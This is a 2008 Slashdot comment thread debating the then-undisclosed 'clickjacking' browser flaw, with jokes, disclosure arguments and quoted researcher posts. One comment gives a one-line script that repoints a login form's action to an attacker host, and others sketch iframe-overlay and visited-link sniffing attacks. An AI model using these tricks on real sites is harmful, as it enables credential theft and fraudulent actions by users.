Ok, but that's different from "bank cards have no protection". Yeah, it's more inconvenient than a credit card being stolen, but you do get your money back. And, while you're waiting for the money to be returned, use your credit card :).

Re:Summary wrong

Sure with that same domain thing? Think this will result in a "Disable CSS" feature request for noscript.. Who needs lynx to scare away web20 developers :P

Re:Summary wrong

But the article says it uses DHTML and your exploit doesn't. Then again, according to the article it must be some unheard-of kind of DHTML that works without Javascript.

Re:Summary wrong

[zarkill]

as other people have mentioned, the firefox web developer toolbar offers a lot of CSS control, but if you don't want to install that and still want to disable all CSS, you can add a "*.css" filter to adblock. it's kludgey, but it will do the job.

Re:Summary wrong

[jonadab]

> As far as I know, DHTML requires a client-side scripting language

My understanding has always been that DHTML *is* HTML with client-side scripting, by definition.

Well, okay, I suppose these days you could make a web page somewhat dynamic with CSS (using things like :hover), but at the time the term "DHTML" was coined that wasn't possible, so I'm not sure if it counts as DHTML.

> the most popular of which (only?) is JavaScript.

Javascript is the most common name for the only one that's even vaguely popular, which is also the only one implemented in more than one browser[1]. I'm not sure whether it's the only one enabled by default in a major browser, since I'm not sure at this point whether IE has VBScript enabled by default out of the box. (I mainly just use IE to test my own websites for IE compatibility, so I haven't kept up on all of its non-standard features.)

[1] Technically, the word "browser" here should probably be some more complicated term or phrase, along the lines of "vendor's browser framework" or whatnot, to account for the fact that the bulk of IE can be rebranded and/or embedded in a different UI to make things like MSN Explorer and Maxthon.

Re:Summary wrong

Who or what is "roc"?

Re:Summary wrong

mmm Guinness.

Re:Summary wrong

It was also done in Phishing Exposed in '05. It's basically a CSRF (Cross-Site Request Forgery). In Phishing Exposed, the example added a book to a victim's wishlist.

Re:Summary wrong

[ConceptJunkie]

Guinness. It's good for you.

Thank Jeebus!

Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browsers exploit! I swear!

Re:Thank Jeebus!

[Roberticus]

Finally I have a legitimate excuse for all the pr0n sites that are in my browser history. No honey, it isn't me, it's a browsers exploit! I swear!

I don't know how things work for you, but saying that I just got clickjacked is only going to get me into more trouble, not less.

Bullshit?

[sakdoctor]

I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?
Won't be losing any sleep over this one.

Re:Bullshit?

Adobe was mentioned in TFA, no specific details were given but I'd guess that flash is implicated.

Re:Bullshit?

[id]

Except you're wrong, but don't take my word for it (I run ha.ckers.org with RSnake), see what Adobe has to say.

http://blogs.adobe.com/psirt/2008/09/thanks_to_jeremiah_grossman_an.html

-id

Re:Bullshit?

[Spy+der+Mann]

God bless Flashbock!

Re:Bullshit?

Don't trust that link!

Re:Bullshit?

[lgw]

I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?

Ahh, the old "I don't understand it so it must be unimportant" fallacy. Now I know my boss's Slashdot ID!

The exploit targets the human more than some code defect. It's just drawing a fake web page over the real one to disguise what button you're really clicking. This can be done with just CSS, though it's much easier with Javascript.

Re:Bullshit?

[awol]

I too was initially tempted to call bullshit but it seems that (http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-September/016284.html) it's the real deal. Worrying but not something over which to lose too much sleep, yet!, since finding the exploit is the problem.

Re:Bullshit?

like i'd click on that link.

Re:Bullshit?

[dolmen.fr]

The issue is probably that the browser is giving too much rights to the Flash plugin.
May be it is possible to intercept browser events from a Flash object and change them (for example, change the mouse coordinates) before the reach the page event handler.

Konqueror?

Anybody know if/how Konqueror is affected by this??

Re:Konqueror?

[eln]

The summary clearly states that only lynx is not affected. It's pretty obvious what's going on here: the exploit is a nefarious plot to make everyone switch over to lynx, thereby crippling the non-text-based porn industry.

Re:Konqueror?

[moderatorrater]

I knew that sticking with ASCII porn would pay off someday.

Re:Konqueror?

[bishiraver]

Finally! My stock in B(. )( .)bs Inc. will be worth more than the paper the shares are printed on!

Re:Konqueror?

[mpeg4codec]

It's all a huge ploy by the guys at asciipr0n.com!

Re:Konqueror?

"sticking"

TMI

Re:Konqueror?

Are there even any non-text-based porn companies still around??? How do they make money??

Premature claim

[clang_jangle]

scary new browser exploit/threat affecting all the major desktop platforms

I didn't find that information in TFA or in any of the TFAs linked in TFA (here here here here). Though it may be so; it sounds like this exploit makes use of the browser's access to the clipboard.
Elinks FTW!

Re:Premature claim

[kesuki]

actually, i wiki'ed Dhtml and that is where you get the 'cross browser' information http://en.wikipedia.org/wiki/Dynamic_HTML

seems like it's a fundamental flaw in CSS files, after adding noscript https://addons.mozilla.org/addon/722 to firefox add cssviewer https://addons.mozilla.org/en-US/firefox/addon/2104

this allows you to find in the css the code that causes the clicking, and FWIW javascript does make the exploit massively easier, but is not needed, all one needs is to design a css file that does the desired clicks in a 0 pixel frame, and attach it to a nice little dancing pig flash game on that people will forward to all their friends.

Seems like another buzzword

[robinsonne]

From reading TFA (I know, silly me) this seems to be pretty much fear-mongering with a fancy new buzzword. "Clickjacking" oooo scary!

Until some real technical details come up I'd say nothing to see here, move along.

Re:Seems like another buzzword

Since it's claimed to affect any major browser, who would benefit from this fear-mongering then?

OWASP

[Lord+Ender]

was to be discussed at the OWASP conference but was nixed at the last minute at hte request of affected vendors

Well, add OWASP to the list of security organizations with no integrity. It's clear they care about their sponsors, not their members.

Re:OWASP

It appears that the speakers pulled the presentation themselves, not the conference (http://blogs.adobe.com/psirt/2008/09/thanks_to_jeremiah_grossman_an.html)

Re:OWASP

So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information weâ(TM)d have to be sharing. Weâ(TM)d much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue. There will still be holes in many websites due to this problem even after the short term patches are available, but weâ(TM)d rather a few of the more critical problems get patched before we go public.

However, I must stress, this is not an evil âoethe man is trying to keep us hackers downâ situation, a la Michael Lynn vs. Cisco, or Chris Paget vs. HID, or MIT vs. MBTA and so on. We proactively decided it was better to pull the speech ourselves for the time being and for anyone who was looking forward to the speech all I can say is I hope to make it up to you once the vendors are in a better spot. It wasnâ(TM)t an easy decision but it really feels like the best option we have given the current situation. If youâ(TM)re desperate for a way to patch your browser from the issue disable scripting and plugins for the time being. More to come.

Taken from http://ha.ckers.org/blog/20080915/clickjacking/

Re:OWASP

[Lord+Ender]

Ah, OK. I withdraw my criticism of OWASP as the cancellation seems not to be their fault. Apologies, guys.

Re:OWASP

[skis]

Actually, the presenters were the ones that made that decision.

So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information we'd have to be sharing. We'd much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue.
-from ha.ckers.org

Re:OWASP

Said the ueberleet sysadmin who would like to have every single detail of the exploit known so that he may patch or mitigate the issue on the machines he administrates before the handful of people who -may- currently know about this can get to his machines in a fully targeted and surreptitious attack; concluding "sucks to be you" the following day to all the non-ueberleet sysadmin common people when they get pwnd by dozens of scriptkiddies and less methodical ne'er-do-wells after aforementioned exploit detailage made it readily possible for everybody and their dog to use it.

Re:OWASP

[Lord+Ender]

I'm an IT security penetration tester, not a sysadmin. And I want all the details of all known security vulnerabilities. Anything less puts me at a disadvantage to those who do have full details.

And with the advent of organized crime into the hacking scene, you just can't assume white-hat researchers are the only ones discovering these vulnerabilities.

Re:OWASP

[HTH+NE1]

McCoy: I don't have a solution. But furnishing them with firearms is certainly not the answer!
Kirk: Bones, do you remember the twentieth-century brush wars on the Asian continent? Two giant powers involved, much like the Klingons and ourselves. Neither side felt that they could pull out?
McCoy: Yes, I remember -- it went on bloody year after bloody year!
Kirk: But what would you have suggested? That one side arm its friends with an overpowering weapon? Mankind would never have lived to travel space if they had. No -- the only solution is what happened, back then: a balance of power.
McCoy: And if the Klingons give their side even more?
Kirk: Then we arm our side with exactly that much more. A balance of power -- the trickiest, most difficult, dirtiest game of them all -- but the only one that preserves both sides!

Short on explanations

[stuntpope]

FTA: "The issue has nothing to do with JavaScript...", "Javascript is not required to exploit this....", "The exploit requires DHTML." Anyone care to educate me on these seemingly contradictory statements? (and yes, I know DHTML could utilize a different, non-JS scripting language). What else is DHTML but HTML, scripts that run in the browser's scripting engine, and CSS?

Re:Short on explanations

[ray-auch]

Not contradictory at all. The D in DHTML is for dynamic, not scripting. Plenty of dynamic things you can do with CSS alone, such as display (or not), hide/unhide etc. - and dynamic based on user actions (:active :hover :focus).

How does it work?

So how does it work now?

Lynx is safe, but all other's are not. But disabling Javascript doesn't help?
Then there is
"In the meantime, the only fix is to disable browser scripting and plugins"
So what exactly does "browser scripting" mean, if not Javascript?

didn't click

[big+whiffer]

i didn't even click on this story; someone must want me to read this...

One of these things is not like the other.

[Tackhead]

Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Opera and Adobe Flash.

Web browser, Web browser, Web browser, Web browser, and cross-platform method for running code delivered from untrusted sources.

From TFA:

"The threat, called Clickjacking, was to be discussed at the OWASP NYC AppSec 2008 Conference but, at the request of Adobe and other affected vendors, the talk was nixed until a comprehensive fix is ready."

One vendor is, unlike the others, mentioned by name. It happens to be the vendor that ships The One Thing That Is Not Like The Others.

Also from TFA:

"According to someone who attended the semi-restricted OWASP presentation, the issue is indeed zero-day, affects all the different browsers and has nothing to do with JavaScript:"

and

"In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but itâ(TM)s the best we can do right now."

Now we're at a quandary. Your humble correspondent is at a loss to even speculate as to the nature of a technology that Ffirstly isn't Javashit, but which can conceivably be invoked by web content regardless of which web browser is in use, but lastly can be secured against by disabling hated plug-ins.

Re:One of these things is not like the other.

[melikamp]

Mod it up, boys.

Re:One of these things is not like the other.

[Chysn]

> Now we're at a quandary. Your humble
> correspondent is at a loss to even speculate as
> to the nature of a technology that Ffirstly isn't
> Javashit, but which can conceivably be invoked by
> web content regardless of which web browser is in
> use, but lastly can be secured against by
> disabling hated plug-ins.

It's a Flash exploit. I found a proof-of-concept by clicking around TFA, and it promised that the Flash movie would take over my clipboard, forcing me to close the browser window. I'm on Firefox 3.0.2, and the "proof-of-concept" did nothing.

At least nothing obvious. I suppose I could have been rootkitted.

Re:One of these things is not like the other.

Bravo. I'd mod your post up if I could.

Re:One of these things is not like the other.

[X0563511]

Hmm, and hot on the heels of a few other security vulnerabilities.

I'm really hoping crackers exploit the hell out of flash until it's ground underfoot. If we try to do the nice thing, and suggest/recommend PROPER ways of using Flash, and the only thing we get is a resounding 'fuck you,' I think screwing flash over is called-for.

It's a shame Adobe doesn't put something in their toolkit ELUAs about proper use of Flash.

Re:One of these things is not like the other.

[stuntpope]

Oh, do you think so?

(sorry ;)

Firstly lastly hated plug-ins.

Re:One of these things is not like the other.

[jefu]

proper use of Flash

I suspect that Adobe feels that any and all use of Flash is proper use, as do many designers who don't want to cope with HTML and javascript, marketers (who can enforce your watching their videos/animations/...), and lots of others who paid someone to build flash and want their money's worth.

But then I'm a Cranky Old Fart - so get off my browser/lawn.

Re:One of these things is not like the other.

Did you even try pasting from your clipboard?

Re:One of these things is not like the other.

[edalytical]

It's a shame Adobe doesn't put something in their toolkit ELUAs about proper use of Flash.

You mean like this?

ADOBE
Adobe Flash
Software License Agreement
[...]
9 and 3/4. Proper Use.

When used, you may only use the Software to create homestarrunner.com. You may not use the Software in any way to create any other content whatsoever. You shall be solely responsible to your end users for any hate, threats on your life, or other liability which may arise from the end users' access to the content that is not homestarrunner.com. Failure to follow the proper use clause may be hazardous to your health and well being, in extreme causes this could be fatal. Other penalties may include permanent ejection from the 1nt3rw3bz. You have been warned!

Re:One of these things is not like the other.

[stevied]

I'm not sure the clipboard hijacking is anything to do with this new 'clickjacking' issue - it came up about a month ago, I'm fairly sure it was on slashdot at the time.

I'm really not sure what that link ("SEE: Adobe Flash ads launching clipboard hijack attack") is doing in the middle of the ZDNet post.

Re:One of these things is not like the other.

[textstring]

you did notice that flash exploit they link to is from a month ago?

Re:One of these things is not like the other.

I followed TFA and sure enough, after loading the demo ( http://raffon.net/research/flash/cb/test.html ), I found http://www.evil.com in my clipboard.
Woohoo! Give it a try, it's fun!

Re:One of these things is not like the other.

[Chysn]

> Did you even try pasting from your clipboard?

Yes. There was nothing in my clipboard. But the exploit isn't just supposed to put something in my clipboard; it's supposed to force me to "click" on something.

Re:One of these things is not like the other.

Yeah, the exploit does work, even on Firefox/Linux. It's not persistent in the clipboard though and easily overwritten just by selecting something else. The permanent clipboard hijack must be a benefit of running Windows.

I run FlashBlock and Adblock Plus so I probably don't see any of these compromised Flash ad thingies anyway.

Re:One of these things is not like the other.

[Onaga]

At least nothing obvious. I suppose I could have been rootkitted.

I tried it, too, but didn't notic

hahah... im a n00b

wtf? what's going on with my ke

penis

I was clickjacked

There was this slashdot article here.

Turns out some hacker clickjacked the link, replacing it with a useless link with no detail or value added. It is getting more and more common on slashdot.

The fix is ...

p0rn mode

Using CSS + JS To Find Visited Links

[WebmasterNeal]

This could be totally unrelated to this exploit but I devised a way to do something like this in the past where I'd use javascript to check whether a link on a page has been visited by the user or not based on what color it was. Given a huge list of websites, you could weed out what sites a user has visited and what sites they haven't by dynamically adding them to the page, then looping through the links using javascript. It could then potentially be written to a log file with the users IP.

But does it affect the links browser?

[rwa2]

Using the links browser in a terminal with mouse support is almost exactly like using a browser with images turned off...

Witness:
http://www.jikos.cz/~mikulas/links/screenshots/png.html

Re:But does it affect the links browser?

1) it affects flash, so no, links is not affected
2) links is not like using a normal browser, monospace color characters cannot do correct formatting. Although, for a terminal browser, links is fairly impressive
3) I don't know how well linking to some tiny server with a page full of photos on slashdot will turn out

Re:But does it affect the links browser?

Holy crap, links has come a long way since I last used it. Currently I'm using Firefox + Adblock Plus + NoScript = web browsing nirvana. I don't really frequent "Web 2.0" sites that much; I will have to give links another try.

viral browser market cleaning

[sarbrot]

ok - i read TFA, scanned all the links blogs, their trackbacks and comments and from what i've seen there is no real info on what this is. Thinking about it for 2 minutes I had this idea that this will be best chance ever to get rid of IE6. My hope is that all the browser vendors (including MS) have conspired that maybe 3 weeks of making scary "clickjacking" news and pushing them to the main media outlets will eventually raise awareness to let go of that horrible thing that's keeping the web from really evolving. finally a good excuse to disable your content for outdated browsers that aren't patched any more because the user might accidently the whole clickjack. But in the end - if the download links don't get clickjacked that is - MS will propably release some stupid patch that prevents IE6 from clickjacking alltogether and it will be 3 more years before IE6 leaves for good....

Re:viral browser market cleaning

[atraintocry]

They don't need a conspiracy. Security problems like this are exactly *why* running an old (well, old and unsupported) browser is asking for problems. Of course, IE6 on XP SP2 is supported by Microsoft for the time being, despite it's age, so it's going to be something we have to put up with for the time being.

Too bad they don't just patch the renderer :D

Absolutely fascinating

I'm expecting this gem to be the next Rickroll. Thanks MST3K. :)

Scary?

[pyrr]

I'm trying to think of the ways this could be used to cause harm, so far the biggest threat I see is to the pay-per-click ad model, since this would be great for clickfraud. Other than that, a website could bounce you to another page on their site that you didn't intend to go to, and possibly overwhelm your browser & bandwidth with a redirect loop. I can see a hint of an issue in the way frames might be used with this exploit and 3rd-party sites (as noted in the article), but that seems to be a bit of a stretch since the original site would still be sending someone away from their site in another redirect. Plenty of sites who make the choice to be annoying already make you go through a little effort to break out of their frames when you go to an external site from one of their links, it's not the end of the world.

I'd like to hear other folks' ideas on ways this may be used for an exploit that could do damage to anything other than Google's bottom-line. Until I hear a more compelling one, this exploit doesn't strike me as being the least bit "scary". A "small potential nuisance" might be a more apt description, since it would be fairly simple for end users to just ignore its effects.

Re:Scary?

So that wasn't you who purchased 200 plastic vaginas on ebay?

Re:Scary?

[Idaho]

I'm trying to think of the ways this could be used to cause harm, so far the biggest threat I see is to the pay-per-click ad model [..]

If you really have trouble thinking of ways in which this can cause harm more serious than pay-per-click fraud, I really hope your job does not involve making many security-related decisions.

OK, to be a bit more constructive about it, have you read Bruce Schneiers' article The Security Mindset? If none if his examples make you think "well, I would have thought of that, given a minute", you are a very trusting person ;) Your life will probably be the better for it -- except in those cases where you get screwed by misplaced trust.

Re:Scary?

[Nathanbp]

How about if a malicious site puts amazon.com in a iframe positioned so as to induce you to hit the 1-click order button on some expensive camera or something? Using an Amazon referral link to themselves, of course.

Re:Scary?

[ThreeGigs]

It apparently doesn't have to redirect you away from the 'main' page you're seeing. It can all happen in a 'hidden' iFrame.

I can think of a lot of web pages where clicking could have a real effect. Especially on sites where users keep themselves logged in. It appears as if they can direct your click to any spot or object on the 3rd party site.

Ready to DIGG a story you know nothing about?
Bid on an eBay auction?
Delete all your old Yahoo/Gmail messages?
What about any site that uses GETs to send a message to the server?
And a really scary thought... can this exploit target pages on the local machine?

Re:Scary?

onmousedown="document.getElementById('SuperSecureLoginForm').action = 'https://attacker.example/pwn'"

Easily used on a non-HTTPS login page that the developer thought was secure because the action was HTTPS.

Re:Scary?

[pyrr]

Does a website have any influence over a frame, embedded or otherwise? Unless things have changed in recent iterations of html usage, I believe the answer is "no".

Re:Scary?

[pyrr]

You could Digg a story you know nothing about. Sucks for Digg, time for more captchas or something.

You could not bid on an eBay auction-- the exploit apparently can only force you to click on links within its own page. Any sort of frames, whether embedded or not, are discrete pages and unless demonstrated otherwise, the primary page can't do anything to them via this script.

If anyone can embed a direct One-click purchasing link on their own webpages to an Amazon product, you could be buying it. If One-click is implemented like that, Amazon is incredibly stupid. I'm under the impression you can only One-click purchase from the appropriate links on the Amazon website, but I choose not to play with fire when it comes to such "conveniences", so I don't know exactly how One-click actually works.

The exploit would not be able to delete your emails from any webmail utility unless they have an allowance for 3rd-party interfaces, much as the above situation.

It would be atrociously bad design for any site to use simple GET commands to do anything more than fetch pages. Anything that requires a login or other user interaction would defeat this exploit.

This exploit could target pages on your local machine, sure! You'd have to code it into the html yourself. Or have a website on your local machine-- the remote site could plug your own IP into a force-clicked link and show you your own site.

The key is understanding the limitations of the protocols and languages involved. Let's not let our imaginations run wild here until the facts are out. Until I have more details that might show otherwise, this exploit simply doesn't seem to have the ability to do anything more than click links in the page you've just loaded without your consent. That means that the exploit:

• Has to be written into the html on the page you're visiting.
• Has no influence on any pages that it hasn't been coded into. All it appears to be able to do is issue GET commands without interaction from the end user.

Re:Scary?

[pyrr]

I'm quite security-minded, thanks! :)

The thing with this exploit is, based on the available information (or lack thereof), and possessing knowledge of what HTML can do and what its limitations are, there's no reason to get hysterical regarding what it "might" be able to do. The key to being security-minded is to analyze the situation, have a good feel for the possibilities. Hysteria-based security is nothing more than a distraction.

Ignorance breeds hysteria. In this example, I have a reasonably good working knowledge of what HTML can do and what it can't. Analyzing the situation, the range of browsers it affects (and doesn't!), and the statements that it doesn't appear to have anything to do with plugins such as Java or Flash tells me a bit about the level it's written at. Assembling these pieces, I have a pretty good idea of what the exploit does. Can it do more than my understanding of it would indicate? Quite possibly, especially if HTML and the more basic webscripting I know is outdated enough.

We'll see how it turns out-- I'm not trusting enough to believe this hysteria is anything meaningful. It could change folks' browsing habits a bit in the short term, and browsers should be patched to stop the exploit. But no, at this point it just doesn't seem like the sky is falling. I'm not scared because the evidence so far just isn't that compelling.

Re:Scary?

[pyrr]

HTTPS =/= "secure"

That's the first problem. HTTPS is only a protocol. The ONLY thing it does is prevents folks from sniffing the traffic between the server and your browser. Pages still have to be constructed competently for them to be secure. If a developer is not being careful about the links he's embedding in a webpage, then competence is the primary issue.

There are plenty of little tricks that require a modicum of prudence in order to thwart. It's a matter of how much someone trusts a website, and making sure certificates are correct.

Re:Scary?

[religious+freak]

Since I don't know the exact nature of the security hole and I didn't read TFA, my idea may not work, but assuming the clickjackEE is at a banking site, the hijacker could potentially create a link which posts data to a different url the jackEE didn't anticipate. This could send the form data (or whatever) to phishers, perhaps including things like account numbers, or if you're posting a password perhaps grabbing that as well (assuming you could shove a certificate in somehow).

I dunno, but seeing as how you just got mainly pointless comments and ridicule with little support, you may have a point.

zomg Flash is insecure

[RockMFR]

Details at 11.

Think about it...

[IrishLimey]

Ever almost accidentally click on an AD that had popped up just as you were going to click on a link?

Why is this a problem?

[Jimmyisikura]

If it hijacks clicks IN browser, you just use alt-f4 to close it down, most people won't even have loaded the page by then. I don't understand how this is worse than malicious redirects. And since most websites people rely on use flash/scripts, I don't see the use in cutting scripts off.

Re:There is nothing to see here....

[X0563511]

That doesn't work. I didn't click and I don't feel either way about not clicking. Meh.

What is missing is accountability.

[bboxman]

The coverage here sounds overhyped. Hype aside, the true nature of the problem is that software vendors are not held accountable to defects in their products (by drafting EULAs that basically negate any responsiblity to any such defect).

We'd have less exploits if vendors, such as M$, were held liable to any damage incurred by their customers.

Re:What is missing is accountability.

[McGiraf]

What about free software in this context? If you lose money because of a bug in the Linux kernel you send a bill to all the contributors? Or you put a low that only registered distributors can distribute software? And if you changed
  one line in an open source app and recompiled it , who is responsible now?

Re:What is missing is accountability.

[pavera]

yeah, and we'd have 0 open source software, and a lot less software in general, and it would be massively expensive.

If MS was liable for damages when someone hacks their systems... well, lets just say code red would have put even MS out of business, I'm sure that nastly little worm cause at least 20-30 billion in damages. Certainly companies would argue that it did.

Re:What is missing is accountability.

[bboxman]

Some exception should be given to someone that is received free of charge. Just as you don't check the teeth of a horse given as a gift, you shouldn't rely on the durability of free software (which is great!). However, if you pay someone for their services, then they should be liable for the quality of their product. Security exploits and hacks are not "exploits" -- they are (usually) defects in the software. Bugs don't happen, people cause bugs by reckless behavior. We would have a higher standard of coding if companies were held liable to buffer overflows carelessly written in by their engineers. We might even have better engineers -- this would probably weed out those 20% of engineers who are responsible for 80% of gross defects.

DETAILS OF THE EXPLOIT!

The exploit was first discovered at about 7:30 am after blogger Ryan Naraine's boss noted several "odd" adult sites appeared in mister Nariane's browser history.

So far, the exploit seems confined to browsers on Mr. Nariane's desktop, so users of effected browsers are urged to apply all public OS/browser patches and to stay away from Ryan's desktop.

And Crome?

[DeltaQH]

Is crome affected? ;-)

Re:And Crome?

[carlmenezes]

This was my first thought. Given all the recent news about Google going to great lengths to secure the Chrome browser (to the point of being accused of reverse engineering Windows and breaking the EULA), this was the first question on my mind.

I've seen this as a bug

[Skapare]

I've seen situations that otherwise look like benign layout bugs, where two or more hyperlinks or other clickable objects end up being overlayed on each other. It's not clear which one would be activated until you click. If someone intentionally did this AND obscured the object they wanted the victim to click, and made the other object more attractive, people might be doing such clicking. This could be easily done with CSS on one page, but there's not advantage since both links are just part of the same page. I don't think frames would do this. However, IFRAMES might do this on a cross "page" basis. The perp makes an attractive link that overlays over an iframe that is loaded from another page, so the act of clicking gets the victim to effective click on the other page. This loads something else in the iframe, but from the perpective of that other web site, it was a click on their page (based on the referer value). The simple exploit would get people to click on an ad, and it would not be visible to the ad vendor which page was doing the exploit.

Re:I've seen this as a bug

[GuldKalle]

Or you could overlay the rest of the iframe page to put the link in another context

Re:I've seen this as a bug

[lamapper]

I've seen situations that otherwise look like benign layout bugs, where two or more hyperlinks or other clickable objects end up being overlay ed on each other. It's not clear which one would be activated until you click. I...which page was doing the exploit.

I have seen this too, since I use Linux and FireFox (FF) I just assumed that the web designer had done something that was Internet Explorer (IE) and/or Active X specific. And therefore was not rendering correctly in other browsers FireFox, Opera, Safari, Konqueror, etc... after all there are more then 13 browsers out there for use and I know that many designers don't test even on one additional browser, but good designers (and testers) do.

I have seen this on the news pages when linking from one article to what I believe to be background and related information from another article, while usually on the same website, occasionally the URL shows another website. I admit that I don't always trust the URL displayed as I understand how the status line of the browser can be changed.

It was irritating to have the text, menus, images overlaid and I figured it was simply poor web design and poor web coding practices with inadequate cross browser testing. Now I am starting to wonder if it was something more!

I have to admit it reminds me of a couple of well known sites that 'scroll' a box as you read an article trying to get you to do something. I hate those things and avoid them like the plague. If there is an alternative news source I stop using sites that use those coding techniques.

My favorite technique for getting rid of these boxes, admittedly does not work if a new tab is not created, is when there is a new 'tab' in my PC's action bar at the bottom of my screen. I point to this new tab with my mouse + right-click and select CLOSE. I stopped using the X CLOSE Box option on any object that either pop-ups or appears when I learned that they can be reprogrammed to do other nasty things while not showing you anything on the status line of the browser.

One site , 0 and catch (one word) is a free site that lets people put up websites for free as long as they accept advertising on their sites. I checked it out over 8 years ago, but did not use it for the reason I am about to tell you here. Initially the site allowed you to select between popup ads and advertising buttons at the top or bottom. You did not have to select both. Later they forced popup ads on anyone using free accounts. You could pay and the advertisement would supposedly be removed. While I still believe a free use for advertising model can work, the idea of forcing popups without being able to op out of them sucks. We all hate popup advertising, the only thing worse then popups are those dang dynamic ads that lock up your browser while they fly information across the screen...I really hate those. Like I need to see Tinker Bell fly across my screen anyway....NOT. Anyway on the 0 + catch site I saw a popup ad, but instead of the X CLOSE box performing a close as advertised and expected, when you looked at the status line in the browser it was going to run some executable (.exe) file on your computer. It was over six years ago so I don't remember whether or not that executable had been downloaded or if it would have downloaded itself. I did not know back then, what I know now about browser objects, thankfully the scammer / phisher / cracker that had written it did not change the status message or I might have accidently hosed myself by clicking the X to close the popup. To this day I will not TRUST a close button on any website, rather using my browser's method of closing any object that I want to get rid of.

I wish I had a list of sites that others could check to see what I saw, but did not bother writing any of them down. My guess is that if you are using IE you may not see the overlays, but now I wonder. I suppose that might be one way to know if it is poor web design versus phishing and scamming, but who

My take

[Spy+der+Mann]

From google cache:

Clickjacking

Thereâ(TM)s been a bit of drama over the last week or so around the upcoming world OWASP conference in New York. Itâ(TM)s surrounding a talk that Jeremiah and I were planning on doing the first day of the conference. Jeremiah and I have been working on some interesting browser security issues which also effect a lot of downstream people/websites/technologies as well. Sounds like a good talk right? We thought so too!

Alas, it turns out that some of the issues we found werenâ(TM)t just a little bad - they were a lot bad. So bad, in fact, that we felt compelled to do some responsible disclosure. One issue lead into another issue into another and poof - we have at least two and probably more incoming vendor patches at a yet to-be-determined date. And weâ(TM)ve only worked with a few vendors. So⦠yah. Itâ(TM)s pretty bad.

As you may have guessed the first is a browser company, Microsoft (to be expected since itâ(TM)s a browser issue to begin with). The second is Adobe - who have been working closely with us on this one since we first told them about the problem. We have been working on proof of concept code since before Blackhat and finally got our ducks in a row with real working exploit code a few weeks ago. And that is pretty much when the problems started. None of the issues we found relating to the browser were particularly easy to fix, it turns out.

The related issues we found that affect websites (instead of browsers) is thankfully slightly easier to deal with on a one off basis, but that too is going to be a problem. There are a lot of much easier hacks out there against websites for sure, but what weâ(TM)ve been working on breaks some previously good security measures. The correct solve will not be patching every web-site on earth. Instead it will likely end up being a browser patch against every major browser. The idea of every webmaster in the world patching their own sites is a non-starter. Although Iâ(TM)m sure lots of people are going to run out and patch their sites rather than wait for the normal browser patch and release cycle for all browsers everywhere. Weâ(TM)ve discussed the high level concern with both Microsoft and Mozilla and they concur independently that this is a tough problem with no easy solve in sight at the moment.

So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information weâ(TM)d have to be sharing. Weâ(TM)d much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue. There will still be holes in many websites due to this problem even after the short term patches are available, but weâ(TM)d rather a few of the more critical problems get patched before we go public.

However, I must stress, this is not an evil âoethe man is trying to keep us hackers downâ situation, a la Michael Lynn vs. Cisco, or Chris Paget vs. HID, or MIT vs. MBTA and so on. We proactively decided it was better to pull the speech ourselves for the time being and for anyone who was looking forward to the speech all I can say is I hope to make it up to you once the vendors are in a better spot. It wasnâ(TM)t an easy decision but it really feels like the best option we have given the current situation. If youâ(TM)re desperate for a way to patch your browser from the issue disable scripting and plugins for the time being. More to come.

This entry was posted on Monday, September 15th, 2008 at 5:36 pm and is filed under Webappsec. You can leave a response as well.

And from the Adobe report:

Thanks to Jeremiah Grossman and Robert "RSnake" Hansen

Robert âoeRSnakeâ Hansen and Jeremiah Grossman recently shared with us some information they were planning to include in an upcoming presentation at the OWASP NYC AppSec confer

IPhone Users Rejoice!

[Vandil+X]

...the lack of Flash support in Mobile Safari is now a security feature!

The devil is in the details

[Ambush+Commander]

In its most primitive form, it basically involves taking an iframe, figuring out where the link part/form part is, and then tricking the user into clicking it.

This seems very clunky and hacky, but I suspect that the speakers at the OWASP talk have gotten this technique to work well enough so that it is both transparent and highly effective. Can you think of a website that needs you to click, say, a play button in order to view content? That click may be hijacked through an invisible iframe to execute an action on another website.

The good folks at Google recently raised this topic on the WHATWG mailing list, you can read more about it here: http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-September/016284.html

Re:The devil is in the details

[zuperduperman]

I'm trying to figure out how this iframe trick can be a true exploit that goes beyond your normal phishing type scenario.

If the user is visiting a malicious domain then it will show that in the browser URL bar. No amount of iframe trickery will (or should) change what they see the location bar. If the user is willing to do sensitive things with a bad domain in the location bar then they are basically up for any kind of phishing attack, and I'm not too worried about that.

On the other hand if it somehow puts the trusted domain in the location bar and then lets an attacker overlay the page with their own contents then I'm very scared.

So - does this trick do something more than slightly better phishing, or not?

Re:The devil is in the details

[Ambush+Commander]

Well, the point about the attack is the user doesn't know their being phished. They think they're just pressing play on a video box, or following a link, or some other innocuous action on a perfectly reasonable, anonymous website on the web.

It's a bit like CSRF, except the browser has no way of telling whether or not the click through the iframe was legitimate or not, whereas with CSRF you could at least detect whether or not the form submission came from the same website. A clickjack is functionally equivalent to the user going to that website and making the action of their own accord.

It is most certainly fixable, but it is not, which is why it's a zero-day.

Re:The devil is in the details

I'm sorry, but when you click on these "visual elements" added to the IFrame, what's the referer sent to the domain??

Re:The devil is in the details

[Ambush+Commander]

Anyone who's been in webappsec for a while will tell you that referers are notoriously unreliable. Anyway, I did a quick test and the referer is that of the previous iframe page. So if I'm browsing Google inside an iframe, Google has no way of knowing it's in an iframe except that the initial page was referred from our website (a perfectly legitimate case that could have been triggered by a link to their website).

I'm still using Gopher

I'm still using Gopher, so I'm getting a big kick out of the misfortune of all you high and mighty "web browser" people.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Kill your Flash, man!

[Phizzle]

OK after RTFAing and reading others comments, isn't this something that can be patched by the Adoobie company? In the meantime I set my faithful Fruitfucker 2000 robot on Extreme Vigilant Flash Plugin Fuxx0ring setting.

